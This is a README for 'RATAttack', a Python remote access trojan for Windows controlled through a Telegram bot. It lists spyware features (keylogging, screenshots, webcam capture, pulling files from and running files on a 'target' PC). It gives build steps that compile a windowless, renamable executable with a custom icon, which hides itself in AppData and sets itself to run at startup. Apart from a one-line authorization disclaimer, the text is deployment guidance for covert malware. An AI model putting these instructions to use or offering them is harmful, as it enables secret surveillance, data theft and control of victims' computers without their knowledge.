Windows Remote Administration Tool via Telegram | Originally created by Ritiek
-
The current Remote Administration Tools in the market face 2 major problems:
- Lack of encryption.
- Require port forwarding in order to control from hundreds of miles.
-
This RAT overcomes both these issues by using the Telegram bot API.
- Fully encrypted. The data being exchanged cannot be spied upon using MITM tools.
- Telegram messenger app provides a simple way to communicate to the target without configuring port forward before hand on the target.
- Run keylogger on the target PC.
- Get target PC's Windows version, processor and more.
- Get target PC's IP address information and approximate location on map.
- List any directories on the target.
- Download any file locally from the target PC in the background.
- Upload local files on to the target PC. Send your image, pdf, exe or anything as
fileto the Telegram bot. - Screenshots of the target PC.
- Execute any file on the target PC.
- [WIP] Self-Destruct RAT on the target PC.
- [WIP] Take snapshots from the webcam (if attached).
- [WIP] Copy and Move files on the target PC.
- [WIP] Delete files on the target PC.
- More coming soon!
- Clone this repository.
- Set up a new Telegram bot talking to the
BotFather. - Copy this token and replace it in the beginning of the script.
- Install the dependencies:
pip install -r requirements.txt. - Install pyHook
64-bitor32-bitdepending on your system.- For 64-bit-
pip install pyHook-1.5.1-cp27-cp27m-win_amd64.whl. - For 32-bit-
pip install pyHook-1.5.1-cp27-cp27m-win32.whl.
- For 64-bit-
- To run the script:
python RATAttack.py. - Find your bot on telegram and send some command to the bot to test it.
- To restrict the bot so that it responds only to you, note down your
chat_idfrom the console and replace it in the script and comment out the linereturn True. Don't worry, you'll know when you read the comments in the script.
When using the below commands; use / as a prefix. For example: /pc_info.
pc_info - PC information
msg_box - display message box with text
snapshot - take picture with webcam
ip_info - via ipinfo.io
download_file - download file from target
list_dir - list contents of directory
run_file - run a file on target
capture_pc - screenshot PC
keylogs - get keylogs
self_destruct - destroy all traces from target PC
You can copy the above to update your command list via BotFather so you don't have to type them manually.
- Go to
C:\Python27\Scripts\or wherever you installed python. - Run
pyinstaller --onefile --noconsole C:\path\to\RATAttack.py. You can also pass--icon=<path\to\icon.ico>to use any custom icon. - Once it is compiled successfully, find the
.exefile inC:\Python27\Scripts\dist\. You can change the name of the.exeto anything you wish. - BEWARE! If you run the compiled
.exe, the script will hide itself and infect your PC to run at startup. You can return to normal by using the/self_destructoption or manually removingC:\Users\Username\AppData\Roaming\Portaldirectory andC:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\portal.lnk(although I recommend removing them manually for the time being).
- You can also modify the name of hidden
.exefile and location & name of the folder where the hidden.exewill hide itself. To do this; modifycompiled_nameandhide_folderrespectively.
- Currently only Python2 is supported. Python3 support will be added soon!
/msg_boxis still in beta and may not work properly.- Keylogger may detect some keys improperly. Like pressing
shift+/results in recording/instead of?.
- This project is still in very early stages, so you can expect some bugs. Please feel free to report them! Even better, send a pull request :)
- Any new features and ideas are most welcome!
This tool is supposed to be used only on authorized systems. Any unauthorized use of this tool without explicit permission is illegal.
The MIT License